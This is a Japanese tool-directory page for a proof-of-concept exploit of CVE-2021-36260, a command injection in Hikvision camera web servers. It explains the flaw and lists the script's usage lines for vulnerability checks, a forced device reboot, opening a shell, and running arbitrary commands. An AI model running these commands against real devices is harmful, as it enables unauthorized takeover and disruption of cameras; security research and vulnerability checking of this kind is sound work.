Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-36260-hikvision | Kitploit
ツール/GitHubGitHub/shubtheone/cve-2021-36260-hikvision
IoTセキュリティ脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHubshubtheone/cve-2021-36260-hikvision

CVE-2021-36260-hikvision

リポジトリを見る
7ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-36260

CVE-2021-36260 POC は、一部のHikvision製品のWebサーバにおけるコマンドインジェクションの脆弱性です。入力検証が不十分なため、攻撃者は悪意のあるコマンドを含むメッセージを送信することで、コマンドインジェクション攻撃を仕掛けることができます。

エクスプロイトタイトル: Hikvision Web Server Build 210702 - コマンドインジェクション

エクスプロイト作者: bashis -- shubtheone によるエラー更新

ベンダーホームページ: https://www.hikvision.com/

バージョン: 1.0

CVE: CVE-2021-36260

参考: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html

すべての功績は Watchful_IP に帰属します

注:

  1. このコードは、リモートがHikvisionデバイスかどうかを 検証しません。
  2. このコードに対する私の関心の大部分は、脆弱性のあるデバイスや悪用可能なデバイスを 確実に検出する方法に集中しています。 一部のデバイスは検出・検証・悪用が簡単ですが、 他のデバイスは脆弱性があっても検証や悪用がそれほど簡単ではない場合があります。 組み合わせた検証コードは非常に高い精度を持つはずだと考えています。
  3. '安全なチェック' (--check) は、検証のために書き込みと読み取りを試みます。 '安全でないチェック' (--reboot) は、検証のためにデバイスの再起動を試みます。

[例] 安全な脆弱性/検証チェック: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check

安全および安全でない脆弱性/検証チェック: ('安全なチェック'で検証されない場合にのみ '安全でないチェック' を使用します) $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot

安全でない脆弱性/検証チェック: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot

SSHシェルを起動して接続: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell

コマンドを実行: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd "ls -l"

ブラインドコマンドを実行: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind "reboot"

CVE-2021-36260-hikvision

ツールをダウンロード